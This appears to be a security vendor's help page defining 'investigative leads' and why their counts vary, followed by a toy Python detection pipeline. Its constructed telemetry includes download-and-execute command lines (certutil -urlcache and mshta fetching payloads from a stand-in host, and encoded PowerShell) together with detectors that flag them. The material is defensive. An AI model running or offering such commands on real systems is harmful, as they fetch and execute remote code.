What is the definition of the field "Investigative Leads" referenced in various reports?
Investigative leads, also called tipoffs, are analytical leads generated when raw telemetry data and alerts match one of the detectors in our detector list. Tipoffs are then deduplicated and cross-checked against suppressions before they are sent to Detection Engineering for review.
This field is referenced in the reports below:
- Background: Red Canary by the Numbers
- Background: Intelligence & Detection Engineering
Investigative lead totals vary from one period to the next (for example, week to week or month to month) for several reasons. The biggest are:
- Changes in the total number of endpoints reporting data within the specified time period
- New detectors introduced during the specified time period
Because every reporting endpoint's telemetry is matched against every active detector, either change raises the number of matches even when the underlying activity is unchanged, so compare periods only after accounting for both.
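The following is an added illustration of the pipeline described above (telemetry matched against detectors, deduplication, suppression check, then leads for review) and of why lead totals shift with endpoint counts and detector introductions. It is example code written for this page, not Red Canary's own implementation; the detector names, the suppression list and the telemetry records are all constructed, and the deduplication key (detector, endpoint, matched command line) is an assumption.

```python
"""Toy model of an investigative-lead (tipoff) pipeline.

Hypothetical code for illustration only: detectors, suppressions and
telemetry below are constructed and do not come from any real product.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Set, Tuple

Event = Dict[str, str]


@dataclass(frozen=True)
class Detector:
    name: str
    predicate: Callable[[Event], bool]
    introduced_week: int  # a detector only produces tipoffs from this week on


@dataclass(frozen=True)
class Tipoff:
    detector: str
    endpoint: str
    week: int
    evidence: str  # the command line that matched; part of the dedup key


# Constructed telemetry: one dict per process event (not real data).
TELEMETRY: List[Event] = [
    {"week": "1", "endpoint": "host-a", "image": "powershell.exe", "cmdline": "powershell -enc SQBFAFgA"},
    {"week": "1", "endpoint": "host-a", "image": "powershell.exe", "cmdline": "powershell -enc SQBFAFgA"},  # exact duplicate
    {"week": "1", "endpoint": "host-b", "image": "certutil.exe", "cmdline": "certutil -urlcache -f http://x/y.exe y.exe"},
    {"week": "1", "endpoint": "host-c", "image": "svchost.exe", "cmdline": "svchost -k netsvcs"},
    {"week": "2", "endpoint": "host-a", "image": "powershell.exe", "cmdline": "powershell -enc SQBFAFgA"},
    {"week": "2", "endpoint": "host-b", "image": "mshta.exe", "cmdline": "mshta http://x/a.hta"},
    {"week": "2", "endpoint": "host-d", "image": "certutil.exe", "cmdline": "certutil -urlcache -f http://x/z.exe z.exe"},
    {"week": "2", "endpoint": "host-e", "image": "backup.exe", "cmdline": "backup.exe /full"},  # benign, newly reporting host
]

# Constructed detector list; names and logic are hypothetical.
DETECTORS: List[Detector] = [
    Detector("encoded_powershell", lambda e: e["image"] == "powershell.exe" and "-enc" in e["cmdline"].lower(), 1),
    Detector("certutil_download", lambda e: e["image"] == "certutil.exe" and "-urlcache" in e["cmdline"].lower(), 1),
    Detector("mshta_remote", lambda e: e["image"] == "mshta.exe" and "http" in e["cmdline"].lower(), 2),  # new in week 2
]

# Constructed suppressions: (detector, endpoint) pairs previously reviewed and judged benign.
SUPPRESSIONS: Set[Tuple[str, str]] = {("encoded_powershell", "host-a")}


def match_detectors(events: List[Event], detectors: List[Detector], week: int) -> List[Tipoff]:
    """Run every detector active in `week` over that week's telemetry; one tipoff per match."""
    active = [d for d in detectors if d.introduced_week <= week]
    tipoffs: List[Tipoff] = []
    for e in events:
        if int(e["week"]) != week:
            continue
        for d in active:
            if d.predicate(e):
                tipoffs.append(Tipoff(d.name, e["endpoint"], week, e["cmdline"]))
    return tipoffs


def deduplicate(tipoffs: List[Tipoff]) -> List[Tipoff]:
    """Collapse repeated matches of the same detector on the same endpoint and evidence."""
    seen: Set[Tuple[str, str, str]] = set()
    unique: List[Tipoff] = []
    for t in tipoffs:
        key = (t.detector, t.endpoint, t.evidence)
        if key not in seen:
            seen.add(key)
            unique.append(t)
    return unique


def apply_suppressions(tipoffs: List[Tipoff], suppressions: Set[Tuple[str, str]]) -> List[Tipoff]:
    """Drop tipoffs that match an existing suppression before they reach review."""
    return [t for t in tipoffs if (t.detector, t.endpoint) not in suppressions]


def investigative_leads(events: List[Event], detectors: List[Detector],
                        suppressions: Set[Tuple[str, str]], week: int) -> List[Tipoff]:
    """Full pipeline: match -> deduplicate -> suppression check -> leads for Detection Engineering."""
    return apply_suppressions(deduplicate(match_detectors(events, detectors, week)), suppressions)


def weekly_summary(events: List[Event], detectors: List[Detector],
                   suppressions: Set[Tuple[str, str]], weeks: List[int]) -> Dict[int, Dict[str, float]]:
    """Lead totals alongside the two factors that move them: reporting endpoints and active detectors."""
    summary: Dict[int, Dict[str, float]] = {}
    for w in weeks:
        leads = investigative_leads(events, detectors, suppressions, w)
        endpoints = {e["endpoint"] for e in events if int(e["week"]) == w}
        active = sum(1 for d in detectors if d.introduced_week <= w)
        summary[w] = {
            "leads": len(leads),
            "endpoints": len(endpoints),
            "active_detectors": active,
            "leads_per_endpoint": len(leads) / len(endpoints) if endpoints else 0.0,
        }
    return summary


if __name__ == "__main__":
    for week, stats in weekly_summary(TELEMETRY, DETECTORS, SUPPRESSIONS, [1, 2]).items():
        print(f"week {week}: {stats}")
```

In the constructed data, week 2 produces twice as many leads as week 1 even though each host's behaviour is similar: one more endpoint is reporting and the mshta detector did not exist in week 1. Reporting leads per reporting endpoint together with the active detector count, as `weekly_summary` does, makes that kind of shift visible rather than reading as a change in the threat picture.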